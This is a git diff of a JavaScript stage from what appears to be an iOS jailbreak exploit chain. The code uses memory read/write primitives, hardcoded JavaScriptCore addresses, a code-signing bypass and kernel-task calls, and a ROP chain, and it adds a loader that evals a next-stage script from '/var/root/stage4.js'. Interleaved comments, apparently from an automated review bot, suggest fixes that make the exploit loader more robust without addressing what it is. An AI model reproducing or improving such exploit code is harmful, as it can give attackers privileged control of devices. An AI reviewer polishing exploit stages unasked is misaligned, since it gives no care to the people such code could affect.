Diffstat (limited to 'src/js/main.js')
-rw-r--r--src/js/main.js155
1 files changed, 56 insertions, 99 deletions
diff --git a/src/js/main.js b/src/js/main.js
index 0a1de50..e077fbe 100644
--- a/src/js/main.js
+++ b/src/js/main.js
@@ -22,23 +22,53 @@ var MAP_ANON = 0x1000;
var victim = {a: 13.37};
if (0) {
-/*
- * leftover shit from jsc_fun, used to be using `log`
- */
-try {
- puts("we out here in jsc");
-} catch (e) {
/*
- * we don't have puts. :(
+ * leftover shit from jsc_fun, used to be using `log`
*/
-
- puts = function (){};
+ try {
+ puts("we out here in jsc");
+ } catch (e) {
+ /*
+ * we don't have puts. :(
+ */
+
+ puts = function (){};
}
}
var JSStringCreateWithUTF8CString = 0x239f9d0d;
var JSObjectGetProperty = 0x239fa411;
var JSContextGetGlobalObject = 0x239f8dfd;
+var bootstrap_port = 0x10b;
+var kCFBooleanTrue;
+var kCFBooleanFalse;
+var kCFPreferencesAnyUser;
+var kCFPreferencesCurrentHost;
+var kIOMasterPortDefault = NULL;
+var options = {};
+
+function parse_nvram_options() {
+// read_u32(dlsym(dlopen("/System/Library/Frameworks/IOKit.framework/IOKit", RTLD_NOW), "kIOMasterPortDefault"));
+ var kIOMasterPortDefault_ptr = shit_heap(4)
+ IOMasterPort(bootstrap_port, kIOMasterPortDefault_ptr);
+ kIOMasterPortDefault = read_u32(kIOMasterPortDefault_ptr);
+ var registry_entry = IORegistryEntryFromPath(kIOMasterPortDefault, "IODeviceTree:/options");
+
+ if (registry_entry) {
+ var p0laris_options_size = shit_heap(4);
+ write_u32(p0laris_options_size, 0x4000);
+ var p0laris_options = malloc(read_u32(p0laris_options_size));
+
+ if (IORegistryEntryGetProperty(registry_entry, "p0laris_options", p0laris_options, p0laris_options_size) == KERN_SUCCESS) {
+ var p0laris_options_buf = read_buf(p0laris_options, read_u32(p0laris_options_size));
+ var p0laris_options_js_str = "";
+ for (var i = 0; i < p0laris_options_buf.length; i++) {
+ p0laris_options_js_str += String.fromCharCode(p0laris_options_buf[i]);
+ }
+ options = JSON.parse(p0laris_options_js_str);
+ }
+ }
+}
function main() {
/*
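Review bot: `JSON.parse(p0laris_options_js_str)` at the end of `parse_nvram_options` has no error handling, so a malformed or truncated `p0laris_options` value read back from the registry throws and the exception propagates out of the caller; wrap it, `try { options = JSON.parse(p0laris_options_js_str); } catch (e) { options = {}; }`, so a bad value degrades to the empty default the file already initialises. The `shit_heap(4)` call on the first line of the body is missing its semicolon. The registry entry and the `malloc`'d `p0laris_options` buffer are never released after use; if the shim exposes `IOObjectRelease` and `free`, release them before returning, and if it does not, a comment saying the leak is accepted would stop the next reader from hunting for it.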
@@ -56,16 +86,12 @@ function main() {
init_sptr_heap();
- scall("printf", "%x %x %x %x\n", 0x41, 0x42, 0x43, 0x44);
+ syslog(LOG_SYSLOG, "we out here");
+ syslog(LOG_SYSLOG, "stage3");
puts("we out here");
puts("I came through a portal holding a 40 and a blunt. Do you really wanna test me right now?");
- printf("slide=0x%x\n", slide);
- printf("*(uint8_t*)base = 0x%x\n", read_u8(base));
- printf("*(uint16_t*)base = 0x%x\n", read_u16(base));
- printf("*(uint32_t*)base = 0x%x\n", read_u32(base));
-
var dyld_shc_slide = get_dyld_shc_slide();
sym_cache["JSStringCreateWithUTF8CString"] = JSStringCreateWithUTF8CString + dyld_shc_slide;
@@ -74,99 +100,30 @@ function main() {
prep_shit();
- large_buf[0] = 0x41424344;
- printf("%x\n", read_u32(large_buf_ptr));
-
setup_fancy_rw();
- csbypass();
-
- return;
-
-
- printf("%s\n", hexdump(read_buf(0x422200, 0x200), 8, 2, 0x422200, 8, '0'));
+ parse_nvram_options();
-//return;
- var tfp0 = get_kernel_task();
-
- printf("tfp0=%x\n", tfp0);
-
- return;
-
- printf("dead?\n");
- var string_ref = scall("JSStringCreateWithUTF8CString", sptr("victim"));
- printf("dead? %x\n", string_ref);
- var global_object = scall("JSContextGetGlobalObject", read_u32(slid + reserve_addr + 0x44));
- printf("dead? %x\n", global_object);
- var jsobj_addr = scall("JSObjectGetProperty", read_u32(slid + reserve_addr + 0x44), global_object, string_ref, NULL);
- printf("dead?\n");
-
- printf("%x\n", jsobj_addr);
-// printf("%s\n", hexdump(read_buf(jsobj_addr - 0x100, 0x200), 8, 2, jsobj_addr - 0x100, 8, '0'));
- victim.target = parent;
- printf("%x\n", read_u32(jsobj_addr + 0x18));
-// printf("%s\n", prim_dump_u32(read_buf(jsobj_addr - 0x10, 0x60), jsobj_addr - 0x10));
-// printf("%s\n", hexdump(read_buf(jsobj_addr - 0x100, 0x200), 8, 2, jsobj_addr - 0x100, 8, '0'));
-
- /*
- UIAlertView *alert = [[UIAlertView alloc] initWithTitle:@"ROFL"
- message:@"Dee dee doo doo."
- delegate:self
- cancelButtonTitle:@"OK"
- otherButtonTitles:nil];
- [alert show];
- */
-
- return;
-
- var rop_buf = new Array();
- var nop = (0x781a | 1) + slid;
- var zero_arr = [].slice.call(u32_to_u8x4(0));
- var nop_arr = [].slice.call(u32_to_u8x4(nop));
- rop_buf.push(0);
- rop_buf.push(0);
- rop_buf.push(0);
- rop_buf.push(0);
- rop_buf.push(0);
- rop_buf.push(0);
- rop_buf.push(0);
- rop_buf.push(nop);
- for (var i = 0; i < 0x40000; i++) {
- rop_buf.push(0);
- rop_buf.push(0);
- rop_buf.push(0);
- rop_buf.push(0);
- rop_buf.push(nop);
- if (i % 0x1000 == 0) {
- printf("%x\n", i);
+ if (options["sleep_spin"] === true) {
+ while (1) {
+ sleep(3600);
}
}
- rop_buf.push(0);
- rop_buf.push(0);
- rop_buf.push(0);
- rop_buf.push(0);
- rop_buf.push(0x41414141);
- printf("gen'd buf\n");
+ var stage4_bin = malloc(0x400000);
-// printf("%s\n", rop_buf[0].toString(16));
-
- printf("exec'ing\n");
- exec_rop(rop_buf);
- printf("done\n");
+ var fd = open("/var/root/stage4.js", O_RDONLY, 0);
+ var bytes_read = read(fd, stage4_bin, 0x400000);
+ var stage4_bin_buf = read_buf(stage4_bin, bytes_read);
+ var stage4_js_str = "";
+ for (var i = 0; i < stage4_bin_buf.length; i++) {
+ stage4_js_str += String.fromCharCode(stage4_bin_buf[i]);
+ }
-// var tfp0 = get_kernel_task();
+ printf("stage4 time baby\n");
+ eval(stage4_js_str);
-// printf("tfp0=%x\n", tfp0);
+ exit(main());
return;
-
- var i = 0;
- while (true) {
- syslog(LOG_SYSLOG, "get rekt from jsc %d (slide=%x)\n", i, slide);
- sleep(0);
- i++;
- }
-
- printf("still alive\n");
};
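Review bot: The stage-4 loader starting at `var fd = open("/var/root/stage4.js", O_RDONLY, 0);` checks neither the descriptor nor the byte count: a failed `open` yields -1, the following `read` then also yields -1, and `read_buf(stage4_bin, -1)` is called with a negative length before `eval` runs on whatever that returns. Guard both, `if (fd < 0) { syslog(LOG_SYSLOG, "stage4 open failed"); return; }` after the open and `if (bytes_read <= 0) { syslog(LOG_SYSLOG, "stage4 read failed"); return; }` after the read, and close the descriptor if the shim exposes `close`. A single `read` is also not guaranteed to return the whole file, so a source file larger than one read's worth would silently evaluate a truncated prefix; looping until `read` returns 0 or the 0x400000 buffer is full would be safer. `exit(main())` presumably relies on the eval'd stage-4 source redefining the global `main`; if it does not, this recurses into the current `main` and re-runs the whole setup, so a comment above that line stating the dependency, e.g. `// stage4.js is expected to redefine main(); this calls the new one`, would help. `main`'s opening line is outside this hunk.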